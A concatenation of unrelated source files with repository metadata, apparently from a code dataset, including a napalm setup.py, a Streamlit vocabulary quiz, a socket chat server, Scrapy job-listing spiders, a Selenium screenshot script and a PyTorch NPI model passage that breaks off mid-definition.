graph_options = tf.GraphOptions(optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=False))
if FLAGS.experimental_optimize_placement:
rewrite_options = tf.RewriterConfig(optimize_tensor_layout=True)
rewrite_options.optimizers.append("pruning")
rewrite_options.optimizers.append("constfold")
rewrite_options.optimizers.append("layout")
graph_options = tf.GraphOptions(
rewrite_options=rewrite_options, infer_shapes=True)
gpu_options = tf.GPUOptions(
per_process_gpu_memory_fraction=FLAGS.worker_gpu_memory_fraction)
config = tf.ConfigProto(
allow_soft_placement=True,
graph_options=graph_options,
gpu_options=gpu_options,
log_device_placement=FLAGS.log_device_placement)
return config
|
[
"rsepassi@google.com"
] |
rsepassi@google.com
|
1eb49e531bba0a61323ca155c49e850f6ba1501b
|
17aca286d586dd7f4b7563255781a9d5d5ea1c68
|
/setup.py
|
8a27af08618f3e479afaa67dcd2dca54aaf4f7f0
|
[
"Apache-2.0"
] |
permissive
|
wolcomm/napalm-exaros
|
894f4a05b7e862195d7d54b5f5d7ff6e43885021
|
dc89ac9844761739d805fdfea8eeb478cdaa0438
|
refs/heads/master
| 2021-01-19T17:49:00.434687
| 2017-08-28T12:52:24
| 2017-08-28T12:52:24
| 101,086,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 973
|
py
|
"""setup.py file."""
import uuid
from pip.req import parse_requirements
from setuptools import find_packages, setup
__author__ = 'Ben Maddison <benm@workonline.co.za>'
install_reqs = parse_requirements('requirements.txt', session=uuid.uuid1())
reqs = [str(ir.req) for ir in install_reqs]
description = "Network Automation and Programmability Abstraction Layer with \
Multivendor support"
setup(
name="napalm-exaros",
version="0.1.0",
packages=find_packages(),
author="Ben Maddison",
author_email="benm@workonline.co.za",
description=description,
classifiers=[
'Topic :: Utilities',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS',
],
url="https://github.com/wolcomm/napalm-exaros",
include_package_data=True,
install_requires=reqs,
)
|
[
"benm@workonline.co.za"
] |
benm@workonline.co.za
|
4808b9b25341398fa95d898a73ff184df234b880
|
64072351a4f854652975718a18bf403cc3aae6cb
|
/flash.py
|
fa13791f4f1ba9ae3b3d8ec708a67f5a4b7ed2cc
|
[] |
no_license
|
SHOTA-Nishimu/Nishimu-Streamlit
|
d818e44efb982363e6ca774ff830f3733914fc91
|
8f8c3ec2a31d28a224c47d5c161fd3c452b6ef3a
|
refs/heads/master
| 2023-03-16T21:01:06.486108
| 2021-03-09T01:53:33
| 2021-03-09T01:53:33
| 345,011,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,342
|
py
|
import re
import random
import streamlit as st
import numpy as np
source = 'C:/Users/chisa/desktop/verb01.txt'
with open(source, encoding='utf-8') as f:
d = f.read()
sentence = re.findall('[一-𥻘あ-ん()=~[\]、。「」々・……]+',d)
#print(d)
source02 ='C:/Users/chisa/desktop/verb01answer.txt'
with open(source02, encoding='utf-8') as f2:
d2 = f2.read()
answer = re.findall('[一-𥻘あ-ん()=~[\]、。「」々・……]+',d2)
#print(d2)
word_dict = dict(zip(sentence, answer))
#print(word_dict)
st.title('古文単語練習')
"""
### 次の( )の単語の意味を答えなさい。
"""
question_num=1
for q in range(question_num):
random_index=np.random.randint(low=0, high=len(sentence),size=question_num )
question_word = sentence[random_index[q]]
correct_answer = word_dict[question_word]
c_answer = answer[random_index[q]]
st.header(question_word)
answer_copy= answer.copy()
answer_copy.remove(correct_answer)
wrong_answers = random.sample(answer_copy, 3)
answer_options = [correct_answer]+ wrong_answers
random.shuffle(answer_options)
st.subheader(answer_options)
expander = st.beta_expander('答えを表示する')
expander.header(c_answer)
button =st.button('次の問題を表示する')
|
[
"nisimuras@kyoto-ryoyo.ed.jp"
] |
nisimuras@kyoto-ryoyo.ed.jp
|
f441f140ccab41b7f21ad161ecdefb815bd40c96
|
31c9d69a2d0abe436c0ff31c059d2ffb0ebb318a
|
/pyiaga2002/bin/iaga2mscan.py
|
fbafed8ee0507d0b851e82248f9076392ee5e8b3
|
[] |
no_license
|
CharlesBlais/pyiaga2002
|
d29a934348be0be42da39a0293112fac7e886e10
|
39dfc86c9af51f878bf84b0ecefed1f6bd79b77b
|
refs/heads/master
| 2023-03-31T09:28:11.100948
| 2021-04-09T18:37:07
| 2021-04-09T18:37:07
| 356,368,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,791
|
py
|
"""
.. codeauthor:: Charles Blais
"""
import os
import argparse
import logging
import pyiaga2002.iaga2002 as iaga2002
import pyiaga2002.mscan as mscan
def main():
"""
Convert IAGA2002 file to miniSeed for MSCAN ringserver.
.. see:: iaga2mseed.py
This extends the conversation by updating only difference of files
found in a MSEEDSCAN directory for the ringserver. The content
of the directory per observatory is read, merged, and only the differences
are added.
We will use simplified file structure for this (some BUD structure)
<dir>/<NET>/<STA>/NET.STA.LOC.CHAN.YEAR.DAY.TIMESTAMP
Example:
<dir>/C2/OTT/C2.OTT.R0.UFX.2021.065.1617968213
where timestamp is the submit time
:author: Charles Blais
"""
parser = argparse.ArgumentParser(
description='Read IAGA2002 file as miniSeed')
parser.add_argument(
'filename',
help='IAGA2002 file to convert')
parser.add_argument(
'--directory',
default=os.getcwd(),
help=f'Output file (default: {os.getcwd()})')
parser.add_argument(
'--network',
default='XX',
help='Network code (default: XX)')
parser.add_argument(
'-v', '--verbose',
action='store_true',
help='Verbosity')
args = parser.parse_args()
# Set logging level
logging.basicConfig(
format='%(asctime)s.%(msecs)03d %(levelname)s \
%(module)s %(funcName)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO if args.verbose else logging.WARNING)
stream = iaga2002.read(args.filename)
# Add network code to all traces and update
for trace in stream:
trace.stats.network = args.network
mscan.update(args.directory, trace)
|
[
"charles.blais@canada.ca"
] |
charles.blais@canada.ca
|
24f58281e612f2ee14253e77c4ec908e4bfa1fd3
|
ff2b590018847ab1b4b46fc4eb49c9cb295e68e6
|
/python/basic_data_types/hr_list_comprehensions.py
|
066b605fe9fd784ee691fc84d390cb3491fc1eb7
|
[] |
no_license
|
iamacarrot92/hackerrank_challenges
|
2fc1ad321791e1cd34952014a6c115725e31ca67
|
65a00e0a7fa775a323debdf02a0bd9d5a2686a81
|
refs/heads/main
| 2023-03-06T07:32:20.892879
| 2021-02-08T20:21:04
| 2021-02-08T20:21:04
| 336,607,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
def method_one(x, y, z, n):
rand_grid = []
for i in range(x + 1):
for j in range(y + 1):
for k in range(z + 1):
if (i + j + k) != n:
rand_grid.append([i,j,k])
return rand_grid
def method_two(x, y, z, n):
return [[i, j, k] for i in range(x + 1) for j in range(y + 1) for k in range(z + 1) if sum([i, j, k]) != n]
x = int(input())
y = int(input())
z = int(input())
n = int(input())
print(method_one(x, y, z, n))
print(method_two(x, y, z, n))
|
[
"limbu_101@outlook.com"
] |
limbu_101@outlook.com
|
f2c6e47f8fa5fc9e9b6812e1ce70fca376db9a3f
|
897554d1ffe398f701df82cdf390bf185f97bf20
|
/django-stubs/contrib/gis/sitemaps/__init__.pyi
|
adf328291f3fbe04961f9532a8505eccce8cb58d
|
[
"MIT"
] |
permissive
|
maximmasiutin/django-stubs
|
c0a7bac533b03c81704755c5e4a8eff9a178010d
|
55366fbf087522f860aa242c200f87b36c6c24a7
|
refs/heads/master
| 2023-04-15T09:47:51.980794
| 2021-04-20T12:18:22
| 2021-04-20T16:07:45
| 359,802,871
| 1
| 0
|
MIT
| 2021-04-20T12:12:03
| 2021-04-20T12:12:03
| null |
UTF-8
|
Python
| false
| false
| 95
|
pyi
|
from django.contrib.gis.sitemaps.kml import KMLSitemap as KMLSitemap, KMZSitemap as KMZSitemap
|
[
"noreply@github.com"
] |
maximmasiutin.noreply@github.com
|
3c0544ff3ef7a7c59dbec704c2ef95a890e79a48
|
b60baecf17c616b823b10c9b2102d3a0084dd897
|
/gante_project_euler/solutions/problem_007.py
|
a95e86c799b73ca6aa017523bd08ca554e2fec32
|
[
"MIT"
] |
permissive
|
gante/project_euler
|
19e03ca76372c816506baf577d363cb74f11afc9
|
9b5e780259e28d4f4d66cb4c954623f81aeaa5af
|
refs/heads/master
| 2022-12-09T22:26:10.407925
| 2020-08-29T16:13:54
| 2020-08-29T16:13:54
| 277,366,880
| 2
| 0
|
MIT
| 2020-08-09T21:03:46
| 2020-07-05T19:10:54
|
Python
|
UTF-8
|
Python
| false
| false
| 848
|
py
|
""" Solution for Project Euler's problem #7 """
import os
import time
from datetime import timedelta
from gante_project_euler.math.prime import get_all_primes
def get_solution():
""" Solves the problem and returns the answer.
"""
return get_all_primes(n_primes=10001)[-1]
if __name__ == "__main__":
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
start = time.time()
solution = get_solution()
end = time.time()
print("Solution: {}".format(solution))
print("Elapsed time (w/compile time): {} (HH:MM:SS.us)".format(timedelta(seconds=end-start)))
# The the code is compiled the first time it runs. This second run uses the cached compilation.
start = time.time()
_ = get_solution()
end = time.time()
print("Elapsed time (wo/compile time): {} (HH:MM:SS.us)".format(timedelta(seconds=end-start)))
|
[
"joaofranciscocardosogante@gmail.com"
] |
joaofranciscocardosogante@gmail.com
|
b8c8e8697cb00b856a2bce08f7028a0be9c31e4a
|
5e3db2bd0227ec1a761ee0f3c7100fb2aca8e5fb
|
/LeetCodeSolutions/stampingseq.py
|
608c2abb0a5d02a35e83f4dbaa46a9e961524c55
|
[] |
no_license
|
Raunak173/hacktoberfest
|
e09eaff87c6e2eb12935c03f404c17e20146f9a8
|
1d21f9a314bfb05674fa793a2a80eedceeca6eda
|
refs/heads/main
| 2023-08-16T04:05:09.908878
| 2021-10-14T09:58:14
| 2021-10-14T09:58:14
| 417,076,974
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,744
|
py
|
class Solution(object):
def movesToStamp(self, stamp, target):
M, N = len(stamp), len(target)
queue = collections.deque()
done = [False] * N
ans = []
A = []
for i in xrange(N - M + 1):
# For each window [i, i+M),
# A[i] will contain info on what needs to change
# before we can reverse stamp at i.
made, todo = set(), set()
for j, c in enumerate(stamp):
a = target[i+j]
if a == c:
made.add(i+j)
else:
todo.add(i+j)
A.append((made, todo))
# If we can reverse stamp at i immediately,
# enqueue letters from this window.
if not todo:
ans.append(i)
for j in xrange(i, i + len(stamp)):
if not done[j]:
queue.append(j)
done[j] = True
# For each enqueued letter,
while queue:
i = queue.popleft()
# For each window that is potentially affected,
# j: start of window
for j in xrange(max(0, i-M+1), min(N-M, i)+1):
if i in A[j][1]: # This window is affected
A[j][1].discard(i) # Remove it from todo list of this window
if not A[j][1]: # Todo list of this window is empty
ans.append(j)
for m in A[j][0]: # For each letter to potentially enqueue,
if not done[m]:
queue.append(m)
done[m] = True
return ans[::-1] if all(done) else []
|
[
"noreply@github.com"
] |
Raunak173.noreply@github.com
|
7670946754ffd4334370da7ccd28a8ed5e95e2dd
|
2b1a4cc1b97042399445baf2507a8485c04b1d70
|
/main.py
|
a9c5936090546db617a13c901eefdcf7c8169d65
|
[] |
no_license
|
yuvalpress/automated-servers-installation
|
ac9c59d9749246c9ce37d9423588486b71cc4eec
|
1573d776976b892846ec7c3d72bbf9099d103593
|
refs/heads/master
| 2023-06-19T18:10:26.154417
| 2021-07-18T13:30:38
| 2021-07-18T13:30:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,175
|
py
|
import sys
import subprocess
import asyncio
from Scripts.iDrac_Scripts import pre_iDrac as pre
from Scripts.iDrac_Scripts import iDrac_IP_Address as set_ip
from Scripts.iDrac_Scripts import iDrac_Rest_Of_Settings as idrac_settings
from Scripts.iDrac_Scripts import iDrac_Raids as set_raid
from Scripts.iDrac_Scripts import iDrac_Configuration as idrac_stracture
from Scripts.iDrac_Scripts import post_kafka_worker as post_storage
def config(iDracs, ex):
print("Creating iDrac objects")
idracs_list = []
for server in iDracs:
# Create iDrac object
iDrac = idrac_stracture.iDracConf(server["name"], server["tmp_ip"], server["ip_address"], server["subnet"],
server["gateway"],
server["timezone"], server["vconsole"], server["boot_mode"], server["vdisks"],
server["pdisks"], server["IP_Check"], server["Raid1_Check"],
server["Raid2_Check"])
idracs_list.append(iDrac)
print("Done!\n")
print("Starting pre stage for all servers..")
try:
pre.do_pre(ex)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Starting IP Addresses changing stage..")
try:
set_ip.ip(idracs_list)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Starting general settings stage..")
try:
idrac_settings.settings(idracs_list)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Starting Raids creation stage..")
try:
set_raid.do_raids(idracs_list)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Creating ISO Costumed images..")
try:
path = sys.argv[1]
print(path)
sub = subprocess.Popen(
["C:\\Users\\admin\\Desktop\\Automated Configuration\\Scripts\\ISO_Scripts\\call_bash_environment.cmd",
path], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print(str(sub.stdout.read()), "\n")
print("error: ", sub.stderr.read())
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Mounting ISO Costumed images..")
try:
for server in idracs_list:
sub = subprocess.Popen(["powershell",
"& \"C:\\Users\\admin\\Desktop\\Automated "
"Configuration\\Scripts\\ISO_Scripts\\Bash Scripts\\mountISO.ps1\" {}.iso {}".format(
server.name, server.ip)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if "ERROR: Unable to perform requested operation." in str(sub.stdout.read()).strip("b'").replace("\\r\\n",
"").replace(
"\\r", ""):
print(idrac_stracture.colors.FAIL + "You'll have to mount the ISO yourself because the RACADM "
"remoteimage module doesn't work on "
"iDrac {}".format(server.ip) + idrac_stracture.colors.ENDC)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print(idrac_stracture.colors.OKPURPLE +
"Don't close the script window! Making sure Operating Systems were installed successfully and initiating "
"post "
"installation configuration process." + idrac_stracture.colors.ENDC)
try:
asyncio.run(post_storage.post(ex))
except Exception as err:
print("Failed with the following error: ", err)
if __name__ == "__main__":
print("Analysing Excel file..")
iDracs = idrac_stracture.readExcel(sys.argv[1]).read()
print("Done!")
config(iDracs, sys.argv[1])
|
[
"yuvalpress@gmail.com"
] |
yuvalpress@gmail.com
|
e834abee33916c4a68a8db91f983360ca7551559
|
298a9313f2fac52cfd2529fad036c91c683bc93d
|
/projects/admin.py
|
a535a79739d179874406099d5c927f10a4f752cd
|
[] |
no_license
|
callump5/portfolio_site
|
d91b32a143810574ba00452ed4da2d4862616f6a
|
f0d5e2a07df8e9660ef138fb06becc23302c081f
|
refs/heads/master
| 2020-03-18T07:28:48.217171
| 2018-08-09T19:25:41
| 2018-08-09T19:25:41
| 134,455,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from models import *
# Register your models here.
admin.site.register(Project)
admin.site.register(ProjectGoal)
|
[
"clpullinger@gmail.com"
] |
clpullinger@gmail.com
|
256a0f567c4cf82d318538df5cd13c894da34a4a
|
7de0c43668ab98aba5cfee1db88a435dc667e03f
|
/Exercícios/menor_nome.py
|
8e5b5eb048207b2e12d495c123be02250e40e912
|
[] |
no_license
|
lldenisll/learn_python
|
b9704b86e1de548268da73beb776d33222beb06f
|
b0d0e36ea54bfc09bfd3310999f7e19f8bb44405
|
refs/heads/master
| 2022-09-21T04:39:59.709520
| 2020-06-05T22:29:32
| 2020-06-05T22:29:32
| 269,099,149
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
# def sum_letters(string):
#letters=0
#for i in string:
# if i.isalpha():
# letters += 1
# else:
# pass
#return letters NAO PRECISEI USAR
def menor_nome(nomes):
x=min(listafinal(nomes), key=len)
y = ''.join((x))
return(y.capitalize())
def ignora(list):
newlist=([])
for i in list:
newlist.append(i.split())
return newlist
def listafinal(list):
listafinal=[]
lista=ignora(list)
i=0
while i < len(lista):
x= ''.join(lista[i])
listafinal.append(x)
i=i+1
return listafinal
menor_nome(['maria', 'josé', 'PAULO', 'Catarina'])
# deve devolver 'José'
menor_nome(['maria', ' josé ', ' PAULO', 'Catarina '])
# deve devolver 'José'
menor_nome(['Bárbara', 'JOSÉ ', 'Bill'])
# deve devolver José
menor_nome(['LU ', ' josé ', 'PAULO', 'Catarina'])
menor_nome(['zé', ' lu', 'fê'])
|
[
"namorado@TFGcos-MacBook-Pro.local"
] |
namorado@TFGcos-MacBook-Pro.local
|
4dea393a8b6eaccd3884e191a1b91d88697dd170
|
98f80f5479def187ef2c349ed5e67fa2165b7290
|
/Tugas4/server_thread_chat.py
|
cf0ddfb1898bdc9625870bb98129e2f74990f0d8
|
[] |
no_license
|
farizardin/fp-network-programming
|
2f61e02994e1c44692837bdc30821c5f3eaf9c5e
|
053876a711be1d5cce55ccd80ca51af209548045
|
refs/heads/master
| 2020-05-20T10:41:17.492612
| 2019-05-23T12:22:37
| 2019-05-23T12:22:37
| 185,530,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,343
|
py
|
from socket import *
import socket
import threading
import thread
import time
import sys
import json
from chat import Chat
chatserver = Chat()
class ProcessTheClient(threading.Thread):
def __init__(self,connection,address):
self.connection = connection
self.address = address
threading.Thread.__init__(self)
def run(self):
while True:
data = self.connection.recv(1024)
if data:
self.connection.sendall("{}\r\n\r\n" . format(json.dumps(chatserver.proses(data,self.connection))))
else:
break
self.connection.close()
class Server(threading.Thread):
def __init__(self):
self.the_clients = []
self.my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
threading.Thread.__init__(self)
def run(self):
self.my_socket.bind(('0.0.0.0',8887))
self.my_socket.listen(1)
while True:
self.connection, self.client_address = self.my_socket.accept()
print >> sys.stderr, 'connection from', self.client_address
clt = ProcessTheClient(self.connection, self.client_address)
clt.start()
self.the_clients.append(clt)
def main():
svr = Server()
svr.start()
if __name__=="__main__":
main()
|
[
"fariz.ardin@gmail.com"
] |
fariz.ardin@gmail.com
|
3d32562b9c9b3bd68304cc5d69ec67750c07c849
|
737f4d8ff08f4d88a1d26e50e8a6e147da98da1c
|
/dynamic_scraping/dynamic_test.py
|
7f340b1316aae73585ed2f684fce2a3eeda63dfc
|
[
"MIT"
] |
permissive
|
joaoDragado/web_scraping
|
7016ebd3ad2a2c225fbe16596ea4c28c2178f513
|
2cbc48b81785b5f2b3c5f34b53b2e56b9df25216
|
refs/heads/master
| 2021-01-20T19:05:20.241353
| 2019-04-09T17:46:46
| 2019-04-09T17:46:46
| 60,857,079
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,244
|
py
|
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
# instantiate a chrome options object so you can set the size and headless preference
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--window-size=1920x1080')
chrome_options.add_argument("--disable-notifications")
# directory of chrome driver
chrome_driver = '/archive/Studies/webdrivers/chromedriver'
# initialize/launch chrome
driver = webdriver.Chrome(chrome_options=chrome_options, executable_path=chrome_driver)
# go to Reddit and click the I'm Feeling Lucky button
driver.get('https://www.reddit.com/')
# launch the user dropdown menu (top right)
driver.find_element_by_id('USER_DROPDOWN_ID').click()
#WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.ID, 'USER_DROPDOWN_ID'))).click()
# select night mode
driver.find_element_by_class_name('egZVll').click()
#WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.CLASS_NAME, 'egZVll'))).click()
# capture the screen
driver.get_screenshot_as_file('capture.png')
|
[
"dubmecoco@yahoo.com"
] |
dubmecoco@yahoo.com
|
d53e0cec89d4c41edbc1c5d2e5701117141afbaa
|
890c8b8e90e516a5a3880eca9b2d217662fe7d84
|
/armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_32_bit/thumb_coprocessor_advanced_simd_and_floating_point_instructions/mrc_t2.py
|
24351564450f9932155c2a5dc2732bd0fd535b06
|
[
"MIT"
] |
permissive
|
doronz88/armulator
|
b864135996f876c7857b79a314d4aa06cc19c549
|
0294feac2785c8947e5943ac0c34f941ee4b5fff
|
refs/heads/master
| 2022-11-05T08:14:42.405335
| 2020-06-18T23:53:17
| 2020-06-18T23:53:17
| 273,363,061
| 2
| 0
| null | 2020-06-18T23:51:03
| 2020-06-18T23:51:02
| null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
from armulator.armv6.opcodes.abstract_opcodes.mrc import Mrc
from armulator.armv6.opcodes.opcode import Opcode
from armulator.armv6.arm_exceptions import UndefinedInstructionException
class MrcT2(Mrc, Opcode):
def __init__(self, instruction, cp, t):
Opcode.__init__(self, instruction)
Mrc.__init__(self, cp, t)
def is_pc_changing_opcode(self):
return False
@staticmethod
def from_bitarray(instr, processor):
coproc = instr[20:24]
rt = instr[16:20]
if coproc[0:3] == "0b101":
raise UndefinedInstructionException()
elif rt.uint == 13:
print "unpredictable"
else:
return MrcT2(instr, **{"cp": coproc.uint, "t": rt.uint})
|
[
"matan1008@gmail.com"
] |
matan1008@gmail.com
|
075bbee43f1e72c7c79b99c707655a5804d0ba32
|
4296cb5b97a69382d1fe6b73753a2ffcd1d154c5
|
/abc/C/198.py
|
db0b3658e5eefde55e745e4ef8b00d3c2d351bc3
|
[] |
no_license
|
tokuD/atcoder
|
a199a5fe92be54d0b66ceaf6158116984f52cd01
|
a95a0380af129109fcf48eb1d4994bbb52925320
|
refs/heads/master
| 2023-08-28T10:28:55.763895
| 2021-11-13T15:49:38
| 2021-11-13T15:49:38
| 371,675,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
import math
R,X,Y = map(int, input().split())
dis = math.sqrt(X**2+Y**2)
ans = int(dis//R)
if dis % R != 0:
ans += 1
if ans == 1:
ans += 1
print(ans)
|
[
"megumu112851@gmail.com"
] |
megumu112851@gmail.com
|
2c7627e66788f1ff44c324f5799fc2d2f4f987d2
|
de0e09b1642472458dcd392484eeda5f490841ca
|
/HelloScrapy/spiders/zhilian.py
|
f2a8d9976d4e6bb1531689711fcbd57fa25aa328
|
[] |
no_license
|
lesliebeijing/spider
|
e18d20821af732800e7cf7fdc117cd5b950c9e20
|
38dfd3edc26540f8ba17cfbaf2db3516f97c792b
|
refs/heads/master
| 2021-01-21T09:33:32.599900
| 2017-07-05T07:15:23
| 2017-07-05T07:15:23
| 91,656,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,667
|
py
|
import scrapy
from ..items import CompanyItem
class ZhilianSpider(scrapy.Spider):
name = "zhilian"
search_keys = ['android', 'ios', 'java', '.net', 'c', 'c++', 'php', 'unity', 'unreal', 'linux', 'python',
'测试', '嵌入式', '前端', '大数据', '运维', '机器学习']
def start_requests(self):
for key in self.search_keys:
url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?jl=青岛&kw=%s&p=1&isadv=0' % key
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
companies = response.css('table.newlist')
for company in companies:
name = company.css('td.gsmc a::text').extract_first()
region = company.css('td.gzdd::text').extract_first()
detail_url = company.css('td.gsmc a::attr(href)').extract_first()
if detail_url and 'special.zhaopin.com' not in detail_url:
yield scrapy.Request(detail_url, callback=self.parse_detail, meta={'name': name, 'region': region})
next_page = response.xpath('//li[@class="pagesDown-pos"]/a/@href').extract_first()
if next_page:
yield scrapy.Request(next_page, callback=self.parse)
def parse_detail(self, response):
name = response.meta.get('name')
region = response.meta.get('region')
table_desc = response.css('table.comTinyDes')
items = table_desc.css('tr td span')
nature = ''
size = ''
address = ''
web_site = ''
if len(items) == 8:
nature = items[1].css('::text').extract_first() # 性质
size = items[3].css('::text').extract_first() # 公司规模
address = items[7].css('::text').extract_first() # 地址
elif len(items) == 10:
nature = items[1].css('::text').extract_first() # 性质
size = items[3].css('::text').extract_first() # 公司规模
web_site = items[5].css('a::attr(href)').extract_first() # 网站
address = items[9].css('::text').extract_first() # 地址
if web_site and web_site == 'http://null':
web_site = ''
introduction = ''
intros = response.xpath('//div[@class="company-content"]//*').extract() # 简介
for intro in intros:
introduction += intro.strip()
company_item = CompanyItem({
'name': name,
'region': region,
'nature': nature,
'size': size,
'web_site': web_site,
'address': address,
'introduction': introduction
})
yield company_item
|
[
"fanglin@chinayouthgroup.com"
] |
fanglin@chinayouthgroup.com
|
42a8404053a7918bbbb30fb58779e7abde8170b9
|
0388a394341ec6fa13d3899aa9705ae8a631b5db
|
/code/NPI/pytorch/noisy_WikiData_CSQA/model_vanilla.py
|
e6e3e80425c4d9908b9bf841532e6991b675f14b
|
[] |
no_license
|
CIPITR/SSRP
|
06f08c17b5a1cd8139cf55b27638a557c073ce18
|
8a4b46a6e068e5bff78c1f051380f36496a5cce8
|
refs/heads/master
| 2022-12-13T05:55:54.564735
| 2019-05-27T04:58:07
| 2019-05-27T04:58:07
| 188,771,043
| 10
| 4
| null | 2022-11-22T02:56:56
| 2019-05-27T04:31:23
|
Python
|
UTF-8
|
Python
| false
| false
| 102,229
|
py
|
from collections import defaultdict
import numpy as np
import torch
import torch.nn as nn
import math
class NPI(nn.Module):
def __init__(self, params, none_argtype_index, num_argtypes, num_programs,
max_arguments, rel_index, type_index,
rel_embedding, type_embedding, vocab_embed,
program_to_argtype_table, program_to_targettype_table):
super(NPI, self).__init__()
self.seed = 1
np.random.seed(self.seed)
torch.manual_seed(self.seed)
self.params = params
self.num_timesteps = params['num_timesteps']
self.max_num_phase_1_steps = self.num_timesteps / 2
self.state_dim = params['state_dim']
self.batch_size = params['batch_size']
self.prog_embed_dim = params['prog_embed_dim']
self.argtype_embed_dim = params['argtype_embed_dim']
self.var_embed_dim = params['var_embed_dim']
self.npi_core_dim = params['npi_core_dim']
self.env_dim = params['env_dim']
self.hidden_dim = params['hidden_dim']
self.empty_argtype_id = none_argtype_index
self.sample_with = params["sample_with"]
self.num_argtypes = num_argtypes
self.num_progs = num_programs
self.max_arguments = max_arguments
self.max_num_var = params['max_num_var']
self.prog_key_dim = params['prog_key_dim']
self.var_key_dim = params['var_key_dim']
if params['use_key_as_onehot']:
self.use_key_as_onehot = True
self.var_key_dim = self.num_argtypes + self.max_num_var
self.prog_key_dim = self.num_progs
else:
self.use_key_as_onehot = False
self.max_len = params['max_len']
self.wikidata_embed_dim = params['wikidata_embed_dim']
self.text_embed_dim = params['text_embed_dim']
self.cell_dim = params['cell_dim']
self.eps = 1e-20
self.learning_rate = params['learning_rate']
self.beam_size = params['beam_size']
self.num_programs_to_sample = params['num_programs_to_sample']
self.num_variables_to_sample = params['num_variables_to_sample']
self.num_actions = self.num_variables_to_sample * self.num_programs_to_sample
self.temperature = 0.1
self.terminate_threshold = 0.7
self.phase_change_threshold = 0.2
self.bias_to_gold_type_threshold = 0.3
self.rel_embedding = None
self.query_rel_atten = None
# program_table contains two parameters "Program_Embedding" and "Program_Keys".
# Program_Keys is of dimension num_programs x prog_key_dim.
# Program_Embedding is of dimension num_programs x prog_embed_dim
self.program_embedding = None
self.program_keys = None
# program_to_argtype_table contains a list of list of integers of dimension num_programs x max_arguments
self.program_to_argtype_table = None
# self.argument_type_table contains a parameter "ArgumentType_Embedding".
# No "Argument_Keys" is needed because argument types are determined by the program itself by looking up the self.
# program_to_argtype_table. ArgumentType_Embedding is of dimension num_argtypes x argtype_embed_dim
self.argumenttype_embedding = None
# self.variable_table contains a parameter "Variable_Embedding" and "Variable_Keys".
# Variable tables are 2-way table i.e. for every argument type, there is a list (of maximum upto) N variables of that type.
# So Variable_Keys is of dimension number_of_argtypes x batch_size x max_num_var x var_key_dim (var_key_dim being used to Id the variable)
# and "Variable_Embedding" being of dimension num_argtypes x batch_size x max_num_var x var_embed_dim
self.variable_embedding = None
self.variable_keys = None
# self.variable_mask is of dimension num_argtypes x batch_size x max_num_var
self.variable_mask = None
# self.variable_atten_table contains the attention over all variables
# declared till now. is of dimension num_argtypes x max_num_var
self.variable_atten_table = None
self.kb_attention = None
assert self.beam_size <= self.num_programs_to_sample * self.num_variables_to_sample
self.keep_prob = params['dropout_keep_prob']
self.global_program_indices_matrix = None
self.dont_look_back_attention = params['dont_look_back_attention']
self.concat_query_npistate = params['concat_query_npistate']
self.query_attention = params['query_attention']
self.forced_normalize_ir = bool(1-params['normalize_length'])
self.dtype_float = torch.float
self.dtype_int64 = torch.long
if torch.cuda.is_available():
self.device = torch.device("cuda")
torch.set_default_tensor_type('torch.cuda.FloatTensor')
else:
self.device = torch.device("cpu")
print 100*"$"
print self.device
print 100*"$"
#if self.device=="cuda":
#torch.int32 = torch.cuda.int32
#torch.float32 = torch.cuda.float32
#torch.int64 = torch.cuda.int64
#print 'changed dtypes to cuda'
def create_cell_scopes():
self.dropout = nn.Dropout(1-self.keep_prob)
self.elu = nn.ELU()
self.batch_normalizer = nn.BatchNorm1d(self.npi_core_dim+self.var_embed_dim)
self.npi_scope = "npi_scope"
self.npi_rnn = nn.GRU(input_size=self.npi_core_dim+self.var_embed_dim, \
hidden_size=self.npi_core_dim, batch_first=False)
self.env_scope = "env_scope"
self.env_rnn = nn.GRU(input_size=self.var_embed_dim, hidden_size=self.env_dim, batch_first=False)
self.sentence_scope = "sentence_scope"
self.sentence_rnn = nn.GRU(input_size=self.wikidata_embed_dim+self.text_embed_dim, \
